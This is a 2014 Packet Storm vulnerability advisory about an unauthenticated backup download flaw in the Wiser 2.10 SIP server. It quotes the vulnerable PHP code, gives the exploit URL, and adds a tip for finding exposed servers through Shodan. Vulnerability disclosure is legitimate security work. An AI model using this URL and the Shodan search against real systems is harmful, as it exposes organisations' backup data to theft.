Wiser 2.10 Backup Disclosure

2014-05-19T00:00:00
ID PACKETSTORM:126700
Type packetstorm
Reporter AtT4CKxT3rR0r1ST
Modified 2014-05-19T00:00:00

Description

                                        
                                            `Wiser 2.10 [SIP SERVER] - Backup download vulnerability  
===================================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST  
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]  
.:. Home : http://www.iphobos.com/blog/  
.:. Script : http://www.develsistemas.com.br/  
####################################################################  
VULNERABILITY  
##############  
/var/www/html/voip/sipserver/class/baixarBackup.php  
  
Line 3:  
  
require_once '/var/www/html/voip/sipserver/class/conexao.php';  
  
Line 55-59:  
  
function buscaBackup() {  
$this->conectarSer();  
$sql = "SELECT patch FROM backup WHERE patch IS NOT NULL ORDER BY  
id DESC LIMIT 1";  
$result = mysql_query($sql);  
return $result ? (mysql_num_rows($result)>0 ? mysql_result  
($result, 0, 'patch') : false) : false;  
  
#########  
EXPLOIT  
#########  
  
http://IP/voip/sipserver/class/baixarBackup.php  
  
[Note]: To Find This Ip Go To shodanhq.com And Type Location:  
voip/sipserver/login In Search Box  
`